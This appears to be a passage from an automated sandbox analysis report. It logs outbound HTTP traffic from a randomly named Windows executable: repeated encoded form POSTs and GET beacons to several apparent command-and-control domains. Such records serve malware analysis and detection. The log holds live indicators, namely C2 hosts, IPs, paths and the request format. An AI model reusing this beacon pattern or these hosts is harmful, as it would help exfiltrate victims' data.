                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zM6tPekft8eHGGTiCcW6R4WDsmH0BHN05xQLOv5JCCxuzUw7sO5pRcLLSNuMNDa%2BS5%2FUxpANEPSN7wi4yevGZqJLc7N7igX9pG1HETQPiFf4aaLJtseAvKnj5D2Yy%2BX2%2B4Y%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce848a2b0cc334-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 31 38 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 69 6e 77 61 62 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 65 66 64 74 2f 3f 77 64 39 38 58 4a 70 3d 4d 41 4c 6e 47 73 53 73 43 78 5a 58 41 4a 73 6b 6c 42 48 53 79 76 56 34 43 77 74 2b 72 49 55 35 43 6a 77 52 47 6a 6f 72 76 34 32 62 37 31 47 32 59 5a 47 5a 38 73 45 66 46 57 6b 34 4c 32 44 4a 61 67 67 59 4e 32 46 36 62 45 6c 4a 68 61 71 69 4f 74 2b 72 33 43 36 77 35 76 37 4a 4d 56 52 2f 56 51 4b 68 39 68 44 63 2b 2f 6c 56 50 5a 45 2b [TRUNCATED]
                                                  Data Ascii: 184<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://coinwab.com/index.php/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&amp;2hZdq=H6f4R">here</a>.</p></body></html>0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  17 | 192.168.2.4 | 49754 | 116.213.43.190 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:55.738869905 CEST | 765 | OUT | POST /pqva/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.mqmsqkw.lol
                                                  Origin: http://www.mqmsqkw.lol
                                                  Referer: http://www.mqmsqkw.lol/pqva/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 55 49 4f 58 66 34 46 4f 6d 4b 34 6b 53 45 4e 77 41 77 71 32 78 70 30 39 64 68 59 6f 6d 53 73 4f 32 67 56 50 69 36 45 36 75 7a 71 6c 49 79 6d 43 47 2f 78 48 31 6a 6f 41 61 6e 35 79 72 4a 2f 59 5a 6e 61 2b 46 62 6c 51 36 4a 54 39 53 6b 73 76 32 41 31 2f 41 51 57 73 58 41 50 35 47 67 78 51 6f 71 6e 56 51 58 2f 49 4b 64 76 6b 63 46 74 6d 32 6a 64 30 4b 79 30 45 67 76 4b 38 32 4d 65 6f 79 67 4e 4c 45 31 59 32 6a 55 75 55 61 7a 46 39 48 37 54 47 6b 30 68 78 36 30 47 6b 6b 64 61 38 36 4f 48 6f 51 49 6c 39 45 41 42 58 34 61 56 39 63 6d 70 43 73 2b 76 64 4e 64 65 79 41 36 32 6f 57 41 3d 3d
                                                  Data Ascii: wd98XJp=UIOXf4FOmK4kSENwAwq2xp09dhYomSsO2gVPi6E6uzqlIymCG/xH1joAan5yrJ/YZna+FblQ6JT9Sksv2A1/AQWsXAP5GgxQoqnVQX/IKdvkcFtm2jd0Ky0EgvK82MeoygNLE1Y2jUuUazF9H7TGk0hx60Gkkda86OHoQIl9EABX4aV9cmpCs+vdNdeyA62oWA==


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  18 | 192.168.2.4 | 49755 | 116.213.43.190 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:59.523619890 CEST | 785 | OUT | POST /pqva/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.mqmsqkw.lol
                                                  Origin: http://www.mqmsqkw.lol
                                                  Referer: http://www.mqmsqkw.lol/pqva/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 55 49 4f 58 66 34 46 4f 6d 4b 34 6b 55 6b 64 77 47 58 32 32 36 70 30 79 52 42 59 6f 74 79 73 4b 32 67 5a 50 69 34 6f 71 75 42 2b 6c 49 57 69 43 55 75 78 48 79 6a 6f 41 52 48 35 33 32 5a 2b 55 5a 6e 6d 63 46 61 5a 51 36 4b 76 39 53 67 6f 76 31 33 68 38 42 41 57 79 4f 51 50 33 4a 41 78 51 6f 71 6e 56 51 54 66 32 4b 64 33 6b 64 31 39 6d 78 79 64 31 57 69 30 48 32 2f 4b 38 68 38 65 73 79 67 4d 73 45 30 46 5a 6a 51 65 55 61 7a 31 39 4a 50 48 5a 71 30 67 30 33 55 48 76 31 76 58 75 32 63 69 31 49 75 39 78 50 77 30 30 77 38 45 6e 4e 58 49 56 2b 2b 4c 75 51 61 58 47 4e 35 4c 68 4e 49 4f 79 58 39 5a 78 6d 47 41 43 45 6d 31 6a 43 32 33 4f 48 73 49 3d
                                                  Data Ascii: wd98XJp=UIOXf4FOmK4kUkdwGX226p0yRBYotysK2gZPi4oquB+lIWiCUuxHyjoARH532Z+UZnmcFaZQ6Kv9Sgov13h8BAWyOQP3JAxQoqnVQTf2Kd3kd19mxyd1Wi0H2/K8h8esygMsE0FZjQeUaz19JPHZq0g03UHv1vXu2ci1Iu9xPw00w8EnNXIV++LuQaXGN5LhNIOyX9ZxmGACEm1jC23OHsI=


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  19 | 192.168.2.4 | 49756 | 116.213.43.190 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:08:02.316864967 CEST | 10867 | OUT | POST /pqva/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.mqmsqkw.lol
                                                  Origin: http://www.mqmsqkw.lol
                                                  Referer: http://www.mqmsqkw.lol/pqva/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 55 49 4f 58 66 34 46 4f 6d 4b 34 6b 55 6b 64 77 47 58 32 32 36 70 30 79 52 42 59 6f 74 79 73 4b 32 67 5a 50 69 34 6f 71 75 42 6d 6c 49 6c 71 43 47 5a 64 48 7a 6a 6f 41 59 6e 35 32 32 5a 2f 4f 5a 6e 4f 59 46 61 55 74 36 50 72 39 41 31 38 76 39 6d 68 38 49 41 57 79 47 77 50 36 47 67 77 59 6f 71 58 52 51 58 7a 32 4b 64 33 6b 64 7a 52 6d 6e 7a 64 31 46 53 30 45 67 76 4b 6f 32 4d 65 55 79 67 56 54 45 30 41 6d 6a 44 57 55 62 54 6c 39 46 63 2f 5a 69 30 67 36 79 55 48 38 31 76 61 77 32 63 2b 35 49 75 67 65 50 7a 6f 30 79 37 68 6c 59 31 49 36 71 65 6a 79 4f 70 6e 39 4a 72 33 36 4c 66 57 4d 48 4e 52 56 37 6d 31 72 49 45 77 61 52 48 58 76 46 4d 36 76 41 48 4c 51 45 4f 6b 51 55 53 4c 72 42 4d 37 50 74 68 6b 33 2b 31 37 49 52 56 6a 52 78 30 5a 64 4f 49 79 35 33 59 69 64 59 7a 55 55 54 6b 38 37 69 48 76 59 2b 38 31 6c 68 6e 4f 6b 55 39 4e 75 4f 42 64 69 62 34 65 48 76 34 43 50 72 76 79 76 41 6b 66 77 6e 50 61 35 42 55 69 61 30 72 2f 45 37 44 52 36 75 61 72 70 39 4c 51 46 44 59 39 61 56 6e [TRUNCATED]
                                                  Data Ascii: wd98XJp= [TRUNCATED]


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  20 | 192.168.2.4 | 49757 | 116.213.43.190 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:08:04.861583948 CEST | 498 | OUT | GET /pqva/?wd98XJp=ZKm3cPRqjLICFiRrATX7oY0MbRIIvi8qgjtP/vsOoinDFUrpWf4t7wcwUBRK5t7Qc0H9b4lf1rTESW8G/Q5oJQ2SGD/5MgBfv+zXfj20S4XoQgB8oyIQXRQ=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.mqmsqkw.lol
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  21 | 192.168.2.4 | 49758 | 109.95.158.127 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:08:31.344521999 CEST774OUTPOST /zgi4/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.synergon.space
                                                  Origin: http://www.synergon.space
                                                  Referer: http://www.synergon.space/zgi4/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=MtU2MCtMKafLyyyvSdKB4mjofI1i8BQQDDyGo+jaocQQyefwoU7K7WeNIqyRjVzj7ETEbVKJgkOPotaQ6/hHxcfQ6Jzk/3m4sTbebRM4ZPYnQIN0reAyv9fAqo2kpZITiv3xXg0svsiT+FCP/SMrXBPNhjiUeaNFLr+wVqL1nF/G1LihnD/El4fdj8FAuot83Q==
                                                  Jul 2, 2024 14:08:32.013422012 CEST | 1043 | IN | HTTP/1.1 404 Not Found
                                                  Connection: close
                                                  x-powered-by: PHP/5.6.40
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 810
                                                  content-encoding: br
                                                  vary: Accept-Encoding
                                                  date: Tue, 02 Jul 2024 12:08:31 GMT
                                                  server: LiteSpeed


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  22 | 192.168.2.4 | 49759 | 109.95.158.127 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:08:33.882411003 CEST | 794 | OUT | POST /zgi4/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.synergon.space
                                                  Origin: http://www.synergon.space
                                                  Referer: http://www.synergon.space/zgi4/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=MtU2MCtMKafLyW2vQ7CBtWjpaI1iyRQUDD2Go/3wopAQz77wpV7K6WeNcayUnVzo7EO3bUaJgluPopeQ5OhEj8fS8Jz1yXm4sTbebRoeZPQnQ4d06PAzxNfB6Y2kj5IIiv2SXldLvpmT+EyP+GQoARPP8zjBO70JRLe6KpzHpHGk9tz72yeT347u+7M0jrQ1sfQ+z9tITFbl99nutHEa9WM=
                                                  Jul 2, 2024 14:08:34.557420969 CEST | 1043 | IN | HTTP/1.1 404 Not Found
                                                  Connection: close
                                                  x-powered-by: PHP/5.6.40
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 810
                                                  content-encoding: br
                                                  vary: Accept-Encoding
                                                  date: Tue, 02 Jul 2024 12:08:34 GMT
                                                  server: LiteSpeed


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  23 | 192.168.2.4 | 49760 | 109.95.158.127 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:08:36.473138094 CEST | 10876 | OUT | POST /zgi4/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.synergon.space
                                                  Origin: http://www.synergon.space
                                                  Referer: http://www.synergon.space/zgi4/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=MtU2MCtMKafLyW2vQ7CBtWjpaI1iyRQUDD2Go/3wopIQyJzwo2jK5WeNfayVnVzp7EGobRC3ghePqMKQycFE6MfSwpzl/3mtsTLabR4eZPQnQ6V0quAzzNfAqo2gpZJnivusXlRxvdST9kiPzV4ofhPR9ziCO6JLRI7FKoGapEak4p74hCKb0ZXDtZgYqYMtjssd4sh3I3Dw+NP+qn4RhB54kxN71XI6fAXH4uzxhbDc4hDmstcWeQa1xHmEnaNwwhpvESB9hJwlqJQNumuOuveVrXLrcoWzP5wES+ownXRUmOYGzQde0cGQC8n5l2cjHGn4phBPnurPwNRHGLj30NBr2IWYYxX4dY5GjBcLANATZJhTYSDOSJbmnxw3u4xXMvCnBnWByGk6DW7ZlTuN+lzmIaf/12ohrfTJ6rm6wi2N0pyCC2hFo0kqQzEr+oDAvhN7xLWHSonGAcjYIQx5/QjuObYMV2QHsMjerYnZ0A8OJBrV+8jqPN2fft0tQCgoCgeItYbn2gDOOO/61kSNxs7LRZHigLvqTsJnczAv6KcVWdDH+y/34X2j0z86Y03opLaQtE2wJGp/L9Dj5dPDU5cdRvHfEGFRvJfDCnvHOSkuYtVWc1RLLDOxRJnzStnDkCXy9nWBCvZUQ/O99JCrIsyifvAM8+BWv5yFnnEzFWjRbyOrpk2e9J8Ps/q3TNinSz0DZBbkhPbVh4vmdNaC8tTdnrgUc/UdhJey6wvZnqbeXmUaDjjgFpXCfSjr5YPQ14ZxgVQfNzraPs/qagSlrG8YnZHbdzDK7md1v3WLKLgjhjhT0CQnwf3WOw0QWgyvX6myYTEmVDuydJaIl8Hk5aEMA96sUFiFj+HVDIJQ2xvztpodSywIebc3nMqFU41HG1YSKbIhnzfxgXicQVsUZcn5Kmsg3cUEtwjeNhpavdABoMmwxBYjxdDZzENzJSDxFTey35v58qrrdXDHQxVrlYFX15sBEZ1Tv8IC0jZ/UZ/X [TRUNCATED]
                                                  Jul 2, 2024 14:08:37.136504889 CEST | 1043 | IN | HTTP/1.1 404 Not Found
                                                  Connection: close
                                                  x-powered-by: PHP/5.6.40
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 810
                                                  content-encoding: br
                                                  vary: Accept-Encoding
                                                  date: Tue, 02 Jul 2024 12:08:37 GMT
                                                  server: LiteSpeed


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  24 | 192.168.2.4 | 49761 | 109.95.158.127 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:08:39.009480953 CEST | 501 | OUT | GET /zgi4/?wd98XJp=Bv8WP0Y6I4L4rkLxeI7P9FySYZNc9GwgDECc8onmv+Up0YCRhWOMiFe4VqushDbL0H+yYl3KgA/w0/Chwa1nzYna+/yL7Br3qSv0RQdnV5Z6V6VBi/tSxM4=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.synergon.space
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:08:39.670222044 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Connection: close
                                                  x-powered-by: PHP/5.6.40
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 2247
                                                  date: Tue, 02 Jul 2024 12:08:39 GMT
                                                  server: LiteSpeed
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl"><head><meta http-equiv="Content-type" content="text/html;charset=UTF-8" /><meta name="Author" content="dhosting.pl" /><meta name="Copyright" content="dhosting.pl" /><meta name="Language" content="pl" /><meta name="Robots" content="index, follow" /><title>dhosting.pl - pod tym adresem nie znajduje si aden serwis WWW</title><style type="text/css">a:link, a:visited{font: 12px verdana, sans-serif;color:#333;text-decoration:none;}img{border:0px;}a:hover, a:active{color:#000;text-decoration:underline;}#tresc{font: 12px verdana, sans-serif;color: #333;}#foot{font: 10px verdana, sans-serif;color:#606060;text-align:center;position:absolute;bottom:5px;width:99%;}.f:link, .f:visited{font-size:10px;font-weight: bold;font-family: verdana, sans-ser [TRUNCATED]


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  25 | 192.168.2.4 | 49762 | 162.0.213.72 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:08:58.056879044 CEST | 759 | OUT | POST /ghq5/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.adoby.xyz
                                                  Origin: http://www.adoby.xyz
                                                  Referer: http://www.adoby.xyz/ghq5/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=QPL4jIPWeMtpq53EMgvWCK6pmvHqUJ1rCItRJijgcIUAifx+zZYT7eg/rtkCKnuYGMaGDSp6LWUZWzq+HKABNJ+6aoeOm83EeX0ZpUxSgADIDmMEyyNQo6WskBYgKx4u4I58x1fvBBww4Oo0AbkSTFLVOAnNB67P+rhWIr+m/idXniJH4Yx6Qv1kx5MPE5CgDg==
                                                  Jul 2, 2024 14:08:58.662834883 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:08:58 GMT
                                                  Server: Apache
                                                  Content-Length: 16026
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  26 | 192.168.2.4 | 49763 | 162.0.213.72 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:00.595741034 CEST | 779 | OUT | POST /ghq5/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.adoby.xyz
                                                  Origin: http://www.adoby.xyz
                                                  Referer: http://www.adoby.xyz/ghq5/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=QPL4jIPWeMtpl4HEDnbWHq62jvHqfp1nCPlRJnClc7wAj95+ydET8eg/gNkDX3uDGNn7DT56LWQZWza+HZYeNZ+8GoeM5s3EeX0ZpUV4gDzIDX8EzWhRhaWz0hYgAh414I5kx0TBBD4w4LU0AKkRYFLfTwnTCrO0kYkZKdTA4TRmmkYdppQtCvRXs+F7J6/pYuIhzgGIORiZSflpNj+55jE=
                                                  Jul 2, 2024 14:09:01.199984074 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:09:01 GMT
                                                  Server: Apache
                                                  Content-Length: 16026
                                                  Connection: close
                                                  Content-Type: text/html


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  27 | 192.168.2.4 | 49764 | 162.0.213.72 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:03.180546999 CEST | 10861 | OUT | POST /ghq5/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.adoby.xyz
                                                  Origin: http://www.adoby.xyz
                                                  Referer: http://www.adoby.xyz/ghq5/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:09:03.935009003 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:09:03 GMT
                                                  Server: Apache
                                                  Content-Length: 16026
                                                  Connection: close
                                                  Content-Type: text/html


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  28 | 192.168.2.4 | 49765 | 162.0.213.72 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:06.390818119 CEST | 496 | OUT | GET /ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.adoby.xyz
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:09:07.025094986 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:09:06 GMT
                                                  Server: Apache
                                                  Content-Length: 16026
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  29 | 192.168.2.4 | 49766 | 194.58.112.174 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:12.284603119 CEST | 768 | OUT | POST /uox9/ HTTP/1.1
